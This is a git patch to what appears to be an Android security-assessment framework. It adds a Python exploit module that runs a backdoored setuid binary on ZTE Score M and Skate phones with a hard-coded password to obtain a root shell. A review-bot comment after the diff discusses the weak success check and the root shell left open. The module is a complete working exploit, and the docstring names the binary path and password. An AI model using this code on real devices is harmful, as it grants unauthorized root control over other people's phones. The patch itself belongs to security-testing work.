From 3ae58560c71d8396c2c7fb7e939afd466596463f Mon Sep 17 00:00:00 2001
From: Tyrone Erasmus
Date: Sun, 20 May 2012 15:32:19 +0200
Subject: [PATCH] Added ZTE backdoor exploit
---
client/merc/modules/exploit/root/__init__.py | 0
.../merc/modules/exploit/root/ztebackdoor.py | 24 +++++++++++++++++++
2 files changed, 24 insertions(+)
create mode 100644 client/merc/modules/exploit/root/__init__.py
create mode 100644 client/merc/modules/exploit/root/ztebackdoor.py
diff --git a/client/merc/modules/exploit/root/__init__.py b/client/merc/modules/exploit/root/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/client/merc/modules/exploit/root/ztebackdoor.py b/client/merc/modules/exploit/root/ztebackdoor.py
new file mode 100644
index 00000000..7cfa57b5
--- /dev/null
+++ b/client/merc/modules/exploit/root/ztebackdoor.py
@@ -0,0 +1,24 @@
+from merc.lib.modules import Module
+
+class ztebackdoor(Module):
+ """Description: There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell on the device. This module runs the affected binary with the hard-coded password to get a root shell.
+Affected devices: ZTE Score M and ZTE Skate
+Credit: Anonymous - http://pastebin.com/wamYsqTV
+Coded by: Tyrone Erasmus - MWR Labs"""
+
+ def __init__(self, *args, **kwargs):
+ Module.__init__(self, *args, **kwargs)
+ self.path = ["exploit", "root"]
+
+ def execute(self, session, _arg):
+
+ session.executeCommand("shell", "executeMercuryShell", {'args':'sync_agent ztex1609523'})
+ print "\n----------------------------"
+ returned = session.executeCommand("shell", "readMercuryShell", None).getPaddedErrorOrData()
+ print returned
+ print "---------------------------\n"
+
+ if "#" in returned:
+ print "Success! There is a root shell waiting in shell->persistent\n"
+ else:
+ print "It appears that this did not work :(\n"
\ No newline at end of file
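Review bot: The success test `if "#" in returned:` in `execute` matches a `#` anywhere in whatever `getPaddedErrorOrData()` hands back, so an error string or unrelated output containing that character would be reported as a root shell and could end up as a false finding in an assessment report. Checking the prompt at the end of the output is tighter, e.g. `if returned.rstrip().endswith("#"):` (this assumes the padding is whitespace, which the hunk does not show). The success path also leaves a root shell open in the persistent session, and nothing in the docstring or code says the operator has to close it; I would add `# NOTE: on success a root shell stays open in shell->persistent until the operator exits it` above the success print. `execute` itself has no docstring; one line stating that it returns nothing and reports the outcome only via stdout would help callers.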